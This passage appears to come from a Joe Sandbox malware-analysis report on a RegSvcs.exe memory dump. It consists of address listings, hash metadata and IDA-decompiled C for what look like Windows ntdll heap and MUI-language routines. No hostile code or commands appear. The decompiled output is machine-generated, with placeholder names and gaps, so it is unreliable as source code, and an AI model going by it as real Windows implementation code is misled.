                                          0x0131a5c1
                                          0x0131a5c6
                                          0x0131a5cb
                                          0x0131a5cd
                                          0x013621a9
                                          0x0131a5d3
                                          0x0131a5d3
                                          0x0131a5d3
                                          0x0131a5d5
                                          0x0131a5d8
                                          0x013621b3
                                          0x013621bc
                                          0x013621c2
                                          0x013621cd
                                          0x013621cf
                                          0x013621da
                                          0x013621da
                                          0x013621da
                                          0x013621f7
                                          0x013621f7
                                          0x013621c2
                                          0x0131a5de
                                          0x0131a5e3
                                          0x0131a5e8
                                          0x0131a5ea
                                          0x0136220a
                                          0x0131a5f0
                                          0x0131a5f0
                                          0x0131a5f0
                                          0x0131a5f2
                                          0x0131a5f5
                                          0x01362219
                                          0x0136221b
                                          0x0136208c
                                          0x0136208c
                                          0x0136208c
                                          0x01362095
                                          0x01362096
                                          0x01362097
                                          0x01362098
                                          0x013620a4
                                          0x013620a5
                                          0x013620a9
                                          0x013620a9
                                          0x00000000
                                          0x0131a5f5
                                          0x0131a4bf
                                          0x0131a4d3
                                          0x0131a4d8
                                          0x0131a4da
                                          0x01361ede
                                          0x01361ede
                                          0x01361ee4
                                          0x01361ee9
                                          0x00000000
                                          0x00000000
                                          0x01361f07
                                          0x00000000
                                          0x01361f07
                                          0x0131a4e0
                                          0x0131a4e5
                                          0x0131a4e7
                                          0x013620cb
                                          0x0131a4ed
                                          0x0131a4ed
                                          0x0131a4ed
                                          0x0131a4f2
                                          0x0131a4f5
                                          0x013620d5
                                          0x013620de
                                          0x013620e4
                                          0x013620f6
                                          0x013620f6
                                          0x013620e4
                                          0x0131a4fb
                                          0x00000000
                                          0x0131a4fb
                                          0x0131a4a1
                                          0x0131a4a4
                                          0x0131a4a8
                                          0x00000000
                                          0x00000000
                                          0x0131a4aa
                                          0x0131a4ac
                                          0x00000000
                                          0x00000000
                                          0x0131a4b2
                                          0x0131a4b5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131a4b5
                                          0x0131a43a
                                          0x0131a340
                                          0x0131a346
                                          0x0131a600
                                          0x00000000
                                          0x0131a600
                                          0x0131a34f
                                          0x0131a351
                                          0x0131a358
                                          0x0131a3c6
                                          0x00000000
                                          0x0131a371
                                          0x0131a37a
                                          0x0131a37f
                                          0x0131a382
                                          0x0131a384
                                          0x0131a394
                                          0x00000000
                                          0x0131a396
                                          0x0131a399
                                          0x0131a3a7
                                          0x0131a3b0
                                          0x0131a3b4
                                          0x0131a3bb
                                          0x0131a3d2
                                          0x0131a3da
                                          0x0131a3df
                                          0x0131a3e1
                                          0x0131a3e5
                                          0x0131a3ea
                                          0x0131a3f0
                                          0x0131a3f0
                                          0x0131a3e1
                                          0x00000000
                                          0x0131a3bb
                                          0x0131a394

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: 5cb851761c14fd5da3d5c3bacea7b34c8d9a1db6be109e2365e967947b2678b1
                                          • Instruction ID: a4473752ef8999fd948176b384ff5dc71dd210f4d455709bae113b9bd3e07b29
                                          • Opcode Fuzzy Hash: 5cb851761c14fd5da3d5c3bacea7b34c8d9a1db6be109e2365e967947b2678b1
                                          • Instruction Fuzzy Hash: 154212316093819FD719CF28C884B2BBBE9FF88208F04896DF5868B75AD734D941CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131B477 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 405COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E0131B477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x13ed360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E0131B8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E0133B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x13e8748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E012FB150();
						} else {
							E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E012FB150();
						__eflags =  *0x13e7bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E013B2073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x13e8a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x13eb1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E01339730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E013BA80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E01339660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E013B138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E013AFA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E013BA80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E013BA80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E01317D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E013B1582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E01317D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E013B1582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E0131B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E0131BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E013BA80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}





















































                                          0x0131b486
                                          0x0131b48a
                                          0x0131b48e
                                          0x0131b491
                                          0x0131b493
                                          0x0131b49a
                                          0x0131b49c
                                          0x0131b4a2
                                          0x0131b4a7
                                          0x0131b6fc
                                          0x0131b6fc
                                          0x0131b6b3
                                          0x0131b6c3
                                          0x0131b6c3
                                          0x0131b4b4
                                          0x0136294f
                                          0x01362951
                                          0x01362957
                                          0x0136295d
                                          0x01362961
                                          0x01362980
                                          0x01362985
                                          0x01362963
                                          0x01362978
                                          0x0136297d
                                          0x0136298b
                                          0x01362990
                                          0x01362995
                                          0x0136299d
                                          0x013629a1
                                          0x013629a2
                                          0x013629a2
                                          0x013629a7
                                          0x013629a7
                                          0x01362951
                                          0x0131b4ba
                                          0x0131b4ba
                                          0x0131b4bd
                                          0x0131b4c2
                                          0x0131b6d4
                                          0x0131b4c8
                                          0x0131b4c8
                                          0x0131b4c8
                                          0x0131b4cd
                                          0x0131b4d0
                                          0x0131b4d9
                                          0x0131b4df
                                          0x0131b4e2
                                          0x013629b7
                                          0x013629bd
                                          0x00000000
                                          0x0131b4e8
                                          0x0131b4e8
                                          0x0131b4ef
                                          0x0131b4fa
                                          0x0131b703
                                          0x0131b709
                                          0x0131b70b
                                          0x0131b711
                                          0x0131b711
                                          0x0131b70b
                                          0x0131b503
                                          0x0131b50c
                                          0x0131b511
                                          0x0131b514
                                          0x0131b519
                                          0x013629c5
                                          0x013629c7
                                          0x013629cc
                                          0x013629cd
                                          0x013629cf
                                          0x013629d0
                                          0x013629d2
                                          0x013629d7
                                          0x013629d9
                                          0x013629ee
                                          0x013629ee
                                          0x013629f4
                                          0x013629fa
                                          0x01362a01
                                          0x00000000
                                          0x01362a01
                                          0x013629db
                                          0x013629df
                                          0x00000000
                                          0x00000000
                                          0x013629e1
                                          0x013629e4
                                          0x00000000
                                          0x00000000
                                          0x013629e6
                                          0x013629e6
                                          0x0131b51f
                                          0x0131b51f
                                          0x0131b520
                                          0x0131b525
                                          0x0131b52b
                                          0x0131b52d
                                          0x0131b52e
                                          0x0131b530
                                          0x0131b535
                                          0x0131b53b
                                          0x0131b53d
                                          0x01362a07
                                          0x00000000
                                          0x01362a07
                                          0x0131b549
                                          0x0131b54e
                                          0x01362a12
                                          0x01362a15
                                          0x00000000
                                          0x00000000
                                          0x01362a24
                                          0x0131b559
                                          0x0131b55c
                                          0x01362a34
                                          0x01362a3b
                                          0x01362a4d
                                          0x01362a4d
                                          0x01362a3b
                                          0x0131b566
                                          0x0131b56b
                                          0x0131b56f
                                          0x0131b57b
                                          0x0131b582
                                          0x01362a57
                                          0x01362a5c
                                          0x01362a5c
                                          0x0131b582
                                          0x0131b58b
                                          0x0131b58e
                                          0x0131b592
                                          0x0131b596
                                          0x0131b599
                                          0x0131b59b
                                          0x0131b59e
                                          0x0131b5a3
                                          0x0131b5a6
                                          0x0131b5a9
                                          0x01362a66
                                          0x01362a67
                                          0x01362a73
                                          0x01362a78
                                          0x0131b5b8
                                          0x0131b5b8
                                          0x0131b5bb
                                          0x0131b5bd
                                          0x0131b5bd
                                          0x0131b5c4
                                          0x0131b5f7
                                          0x0131b5f7
                                          0x0131b600
                                          0x0131b606
                                          0x0131b60c
                                          0x0131b612
                                          0x0131b618
                                          0x0131b621
                                          0x0131b623
                                          0x0131b629
                                          0x0131b629
                                          0x0131b62c
                                          0x0131b62f
                                          0x0131b633
                                          0x0131b636
                                          0x0131b639
                                          0x0131b71d
                                          0x0131b720
                                          0x0131b736
                                          0x0131b660
                                          0x0131b660
                                          0x0131b662
                                          0x0131b665
                                          0x0131b66a
                                          0x0131b6e6
                                          0x0131b6e7
                                          0x0131b6ea
                                          0x0131b6ef
                                          0x01362ad1
                                          0x01362ad2
                                          0x01362ad8
                                          0x01362add
                                          0x01362add
                                          0x0131b6f5
                                          0x0131b6f5
                                          0x0131b672
                                          0x0131b675
                                          0x0131b67a
                                          0x01362ae5
                                          0x01362ae8
                                          0x00000000
                                          0x00000000
                                          0x01362af4
                                          0x01362afc
                                          0x00000000
                                          0x0131b680
                                          0x0131b680
                                          0x0131b680
                                          0x0131b685
                                          0x0131b687
                                          0x0131b68a
                                          0x01362b06
                                          0x01362b0c
                                          0x01362b13
                                          0x01362b1e
                                          0x01362b20
                                          0x01362b2b
                                          0x01362b2b
                                          0x01362b2b
                                          0x01362b34
                                          0x01362b45
                                          0x01362b45
                                          0x01362b13
                                          0x0131b696
                                          0x0131b69b
                                          0x0131b6a0
                                          0x01362b4f
                                          0x01362b52
                                          0x00000000
                                          0x00000000
                                          0x01362b61
                                          0x00000000
                                          0x0131b6a6
                                          0x0131b6a6
                                          0x0131b6a6
                                          0x0131b6a8
                                          0x0131b6ab
                                          0x01362b70
                                          0x01362b72
                                          0x01362b7d
                                          0x01362b7d
                                          0x01362b7d
                                          0x01362b86
                                          0x01362b97
                                          0x01362b97
                                          0x0131b6b1
                                          0x00000000
                                          0x0131b6b1
                                          0x0131b6a0
                                          0x0131b67a
                                          0x0131b722
                                          0x0131b722
                                          0x0131b655
                                          0x0131b65d
                                          0x00000000
                                          0x0131b5c6
                                          0x0131b5c6
                                          0x0131b5ce
                                          0x01362a83
                                          0x01362a97
                                          0x01362a97
                                          0x01362a9a
                                          0x00000000
                                          0x00000000
                                          0x01362a88
                                          0x01362a8a
                                          0x01362a8c
                                          0x01362a8f
                                          0x01362a92
                                          0x01362aa1
                                          0x01362aa1
                                          0x01362aa2
                                          0x01362aab
                                          0x01362ab0
                                          0x00000000
                                          0x01362ab0
                                          0x01362a94
                                          0x01362a94
                                          0x00000000
                                          0x01362a9c
                                          0x0131b5d4
                                          0x0131b5d4
                                          0x0131b5d6
                                          0x0131b5d9
                                          0x0131b5de
                                          0x0131b5e1
                                          0x0131b5e4
                                          0x01362ab8
                                          0x01362ab9
                                          0x01362ac4
                                          0x01362ac9
                                          0x0131b5f2
                                          0x0131b5f2
                                          0x0131b5f4
                                          0x0131b5f4
                                          0x00000000
                                          0x0131b5e4
                                          0x0131b5c4
                                          0x0131b554
                                          0x0131b554
                                          0x00000000
                                          0x0131b554

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: daf22b2f9a5eaec5e9bd14118b8209f06111efdf50e2141e3162cd1eaf6c8491
                                          • Instruction ID: a5c1f13092eb60c25f4a32090f31e35ba6fe0b39e3898c151f27424c987d5476
                                          • Opcode Fuzzy Hash: daf22b2f9a5eaec5e9bd14118b8209f06111efdf50e2141e3162cd1eaf6c8491
                                          • Instruction Fuzzy Hash: 67E1AD3060020ADFDB19CF68C894BBEBBB9FF48308F1485A9E5069B799D774E941CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01303D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E01303D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01301B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01301B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01301B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01301B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01301B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01314620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0133F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01341370(_t276, 0x12d4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0133BB40(0,  &_v68, _t170);
									if(L013043C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0133BB40(_t257,  &_v68, _t243);
								if(L013043C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01341370(_t278, 0x12d4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01314620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0133F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01341370(_v16, 0x12d4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0133BB40(_t262,  &_v68, _t244);
								if(L013043C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01341370(_t282, 0x12d4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0133BB40(_t262,  &_v68, _t201);
							if(L013043C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01314620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0133F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01341370(_t280, 0x12d4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0133BB40(_t267,  &_v68, _t245);
							if(L013043C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01341370(_t284, 0x12d4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0133BB40(_t267,  &_v68, _t224);
						if(L013043C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                          0x01303d3c
                                          0x01303d42
                                          0x01303d44
                                          0x01303d46
                                          0x01303d49
                                          0x01303d4c
                                          0x01303d4f
                                          0x01303d52
                                          0x01303d55
                                          0x01303d58
                                          0x01303d5b
                                          0x01303d5f
                                          0x01303d61
                                          0x01303d66
                                          0x01358213
                                          0x01358218
                                          0x01304085
                                          0x01304088
                                          0x0130408e
                                          0x01304094
                                          0x0130409a
                                          0x013040a0
                                          0x013040a6
                                          0x013040a9
                                          0x013040af
                                          0x013040b6
                                          0x013040bd
                                          0x013040bd
                                          0x01303d83
                                          0x0135821f
                                          0x01358229
                                          0x01358238
                                          0x01358238
                                          0x0135823d
                                          0x0135823d
                                          0x01303da0
                                          0x01303daf
